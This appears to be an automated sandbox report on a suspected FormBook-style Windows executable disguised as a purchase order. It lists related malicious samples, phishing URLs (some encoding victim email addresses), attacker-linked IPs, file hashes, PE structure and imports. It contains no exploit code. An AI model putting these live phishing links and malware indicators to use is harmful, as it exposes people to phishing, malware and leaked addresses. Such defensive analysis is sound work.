                    https://uber-dot-yamm-track.appspot.com/23n9C3332xIef2u5qB3FsmMdRmfEUl0juRObEDek2QVW5jqPgkQEUDSjSUOie_PPRN8ZIzLjnKIYf_EcAN6wtHAg6tDGTRfHt9lfAtxT0weLuCVbKoSw6asqJ_UhM7uDzWEWI_6d_QbLGjPw8-X4Ds4m4YHqne99SLBLa7IzDhqNM5JIp-h783DTvcZTRawQQ0zSLGet hashmaliciousUnknownBrowse
                    • 1.1.1.1
                    RFQ Full Spec Supply and Installation Mazrouah - (Phase 4)-doc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • 188.114.97.3
                    Quotation Approved PO#2838800-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • 188.114.96.3
                    CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdChttps://google.com.////amp/s/%E2%80%8Bc%C2%ADt%C2%ADh%E2%80%8B.%C2%ADv%C2%ADn/.dev/Yp0Hz21d/bGF1cmVuLmNvaGVuQGJvYXJzaGVhZC5jb20==$%E3%80%82?safe=activeGet hashmaliciousUnknownBrowse
                    • 47.246.131.28
                    https://Np8W.pivorixal.su/zbs3/?qrc=qa-sqi@qvcjp.comGet hashmaliciousHTMLPhisherBrowse
                    • 47.246.131.144
                    Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                    • 47.57.185.227
                    http://xlchome.com/Get hashmaliciousUnknownBrowse
                    • 8.209.255.96
                    http://is.gd/af4MWe?US=937448/Get hashmaliciousUnknownBrowse
                    • 47.245.132.166
                    http://login-wsapp-hk.top/Get hashmaliciousUnknownBrowse
                    • 8.210.39.246
                    https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com////amp/s/jbmagneticos.com.br/.dev/VGCU2YC1/c211bGxpbmdzQHRtaGNjLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                    • 47.246.146.53
                    https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com.////amp/s/%E2%80%8Bva%C2%ADnd%C2%ADat%C2%ADco%E2%80%8B.%C2%ADv%C2%ADn/.dev/ChZuQF9L/bHlubi5wYXJzb25zQGltYWdvLmNvbW11bml0eQ===$%E3%80%82Get hashmaliciousHTMLPhisherBrowse
                    • 47.246.131.135
                    PO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
                    • 47.57.185.227
                    PROPOSTA CONTRATTUALE.msgGet hashmaliciousHTMLPhisherBrowse
                    • 47.246.131.28
                    LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGPayment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                    • 172.96.191.39
                    PO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
                    • 172.96.191.39
                    Doc_PO6900000827.exeGet hashmaliciousFormBookBrowse
                    • 172.96.191.39
                    OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                    • 103.150.11.230
                    5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                    • 103.150.11.230
                    uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                    • 103.150.11.230
                    PO_20240906011824.exeGet hashmaliciousFormBookBrowse
                    • 172.96.191.39
                    doc330391202408011.exeGet hashmaliciousFormBookBrowse
                    • 172.96.191.39
                    PO #86637.exeGet hashmaliciousFormBookBrowse
                    • 172.96.191.39
                    REQST_PRC 410240665_2024.exeGet hashmaliciousFormBookBrowse
                    • 172.96.191.39

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\7466H3538

                    Download File
                    Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\Esher

                    Download File
                    Process:C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):288768
                    Entropy (8bit):7.994171345784413
                    Encrypted:true
                    SSDEEP:6144:TPWqJJeEuOi/5Gv8DCofKpFZAG6SAzz9XLh97ur4WDG10b:TxcOi0ofKZ6Hn9f6GC
                    MD5:A16E4A19F12A06AE5F763EE553E3D723
                    SHA1:7563DAE4EA5F2062DDD89E10C58D61F463B8F5A3
                    SHA-256:C9938611C4682E86E63C2B5D27E7CBF56C53B738D029E3606D7655C523176F49
                    SHA-512:75A8168CCF617FFECA36CC81827B85E95A999B00A50B888CCE67152A250BFF46C4FFA460FBA23807EC2A6C000819BDE2DB13250758AA7D54AD11777E625CD86F
                    Malicious:false
                    Reputation:low
                    Preview:.....J9J7...P....f.V@...b4_...D3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7.BMYJ,.6Z._.g.8..v.%07.(J5-$"+jZ+Y9-9y&VxJ/$v*(j}.dw/"=!.U5PnVCFJ9J7.CD.yS?.g*1.{*^.-..c$T."...&-.P...q9#..Q9"k#!.9J7WBMYDc.8Z.WBF.v1UWBMYD3X8.JTBMK2J7.FMYD3X8ZJV.RJ9J'WBM)@3X8.JVSFJ9H7WDMYD3X8ZLVCFJ9J7W2IYD1X8ZJVCDJy.7WRMYT3X8ZZVCVJ9J7WB]YD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9dC2:9YD3.m^JVSFJ9.3WB]YD3X8ZJVCFJ9J7wBM9D3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD

                    C:\Users\user\AppData\Local\Temp\aut391C.tmp

                    Download File
                    Process:C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):288768
                    Entropy (8bit):7.994171345784413
                    Encrypted:true
                    SSDEEP:6144:TPWqJJeEuOi/5Gv8DCofKpFZAG6SAzz9XLh97ur4WDG10b:TxcOi0ofKZ6Hn9f6GC
                    MD5:A16E4A19F12A06AE5F763EE553E3D723
                    SHA1:7563DAE4EA5F2062DDD89E10C58D61F463B8F5A3
                    SHA-256:C9938611C4682E86E63C2B5D27E7CBF56C53B738D029E3606D7655C523176F49
                    SHA-512:75A8168CCF617FFECA36CC81827B85E95A999B00A50B888CCE67152A250BFF46C4FFA460FBA23807EC2A6C000819BDE2DB13250758AA7D54AD11777E625CD86F
                    Malicious:false
                    Reputation:low
                    Preview:.....J9J7...P....f.V@...b4_...D3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7.BMYJ,.6Z._.g.8..v.%07.(J5-$"+jZ+Y9-9y&VxJ/$v*(j}.dw/"=!.U5PnVCFJ9J7.CD.yS?.g*1.{*^.-..c$T."...&-.P...q9#..Q9"k#!.9J7WBMYDc.8Z.WBF.v1UWBMYD3X8.JTBMK2J7.FMYD3X8ZJV.RJ9J'WBM)@3X8.JVSFJ9H7WDMYD3X8ZLVCFJ9J7W2IYD1X8ZJVCDJy.7WRMYT3X8ZZVCVJ9J7WB]YD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9dC2:9YD3.m^JVSFJ9.3WB]YD3X8ZJVCFJ9J7wBM9D3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.163255002363799
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:Purchase Order TE- 00011-7777.exe
                    File size:1'227'264 bytes
                    MD5:74e3ad61908355d646036b6b13a20916
                    SHA1:e6b0b4c0ce1cda9218c81d4453b8101745237149
                    SHA256:786448ef89e10b1b440d5c189417acb59a45d5e87e46aa6dc33c015132c46704
                    SHA512:4253b00ec58860918e84e2f0dba421dbfd50411a619e3ea635777236bd6a4e84af0bc8438a9346c60367c00383f03c8932848db83572aea4550706b86098ea5d
                    SSDEEP:24576:o4lavt0LkLL9IMixoEgeaS32JOcXMowJZ2jhWtYq9MmCS:/kwkn9IMHeaSYOce2F5aPCS
                    TLSH:3345C01373DDC3A1C3725273BA65BB01AEBB7C2506A1F59B2FD4093DE920162921E673
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........

                    File Icon

                    Icon Hash:aaf3e3e3938382a0

                    Static PE Info

                    General

                    Entrypoint:0x426bf7
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66E24D24 [Thu Sep 12 02:08:36 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:bbac62fd99326ea68ec5a33b36925dd1

                    Entrypoint Preview

                    Instruction
                    call 00007F2870C7A60Ch
                    jmp 00007F2870C6D4F4h
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    push edi
                    push esi
                    mov esi, dword ptr [esp+10h]
                    mov ecx, dword ptr [esp+14h]
                    mov edi, dword ptr [esp+0Ch]
                    mov eax, ecx
                    mov edx, ecx
                    add eax, esi
                    cmp edi, esi
                    jbe 00007F2870C6D67Ah
                    cmp edi, eax
                    jc 00007F2870C6D9DEh
                    bt dword ptr [004C0158h], 01h
                    jnc 00007F2870C6D679h
                    rep movsb
                    jmp 00007F2870C6D98Ch
                    cmp ecx, 00000080h
                    jc 00007F2870C6D844h
                    mov eax, edi
                    xor eax, esi
                    test eax, 0000000Fh
                    jne 00007F2870C6D680h
                    bt dword ptr [004BA370h], 01h
                    jc 00007F2870C6DB50h
                    bt dword ptr [004C0158h], 00000000h
                    jnc 00007F2870C6D81Dh
                    test edi, 00000003h
                    jne 00007F2870C6D82Eh
                    test esi, 00000003h
                    jne 00007F2870C6D80Dh
                    bt edi, 02h
                    jnc 00007F2870C6D67Fh
                    mov eax, dword ptr [esi]
                    sub ecx, 04h
                    lea esi, dword ptr [esi+04h]
                    mov dword ptr [edi], eax
                    lea edi, dword ptr [edi+04h]
                    bt edi, 03h
                    jnc 00007F2870C6D683h
                    movq xmm1, qword ptr [esi]
                    sub ecx, 08h
                    lea esi, dword ptr [esi+08h]
                    movq qword ptr [edi], xmm1
                    lea edi, dword ptr [edi+08h]
                    test esi, 00000007h
                    je 00007F2870C6D6D5h

                    Rich Headers

                    Programming Language:
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [ASM] VS2012 UPD4 build 61030
                    • [RES] VS2012 UPD4 build 61030
                    • [LNK] VS2012 UPD4 build 61030

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb6b6c0x17c.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x62508.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1270000x6c20.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27700x40.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x858.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x8be740x8c00074af66fa540568c59b3868e78900e476False0.5690970284598215data6.681489717174931IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x8d0000x2c76a0x2c800576c856afaad699ad9fe099fc6a9ce33False0.33122476299157305zlib compressed data5.781163507108141IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0xba0000x9f340x6200e6d2e204147f7cdc3055011093632f54False0.1639030612244898data2.004392861291539IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0xc40000x625080x62600bcc00f8079d8a6a14864c1cf7953aafdFalse0.9332016359593392data7.905350495306896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x1270000xa4620xa600c2f6ddaeef894b7510c3be928eeae5ddFalse0.5080948795180723data5.238496692777452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                    RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                    RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                    RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                    RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                    RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                    RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                    RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                    RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                    RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                    RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                    RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                    RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                    RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                    RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                    RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                    RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                    RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                    RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                    RT_RCDATA0xcc7b80x597b3data1.0003301365564847
                    RT_GROUP_ICON0x125f6c0x76dataEnglishGreat Britain0.6610169491525424
                    RT_GROUP_ICON0x125fe40x14dataEnglishGreat Britain1.25
                    RT_GROUP_ICON0x125ff80x14dataEnglishGreat Britain1.15
                    RT_GROUP_ICON0x12600c0x14dataEnglishGreat Britain1.25
                    RT_VERSION0x1260200x138dataEnglishGreat Britain0.592948717948718
                    RT_MANIFEST0x1261580x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                    Imports

                    DLLImport
                    WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                    COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                    WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                    PSAPI.DLLGetProcessMemoryInfo
                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                    USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                    UxTheme.dllIsThemeActive
                    KERNEL32.dllWaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, CloseHandle, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, CreateThread, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, GetLastError, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, DuplicateHandle, GetCurrentProcess, EnterCriticalSection, GetCurrentThread, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, FindNextFileW, SetEnvironmentVariableA
                    USER32.dllCopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, AdjustWindowRectEx, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, UnregisterHotKey, SystemParametersInfoW, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, GetCursorPos, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, FindWindowW, CharLowerBuffW, GetWindowTextW
                    GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                    ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHGetFolderPathW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                    OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishGreat Britain

                    Network Behavior

                    Suricata IDS Alerts

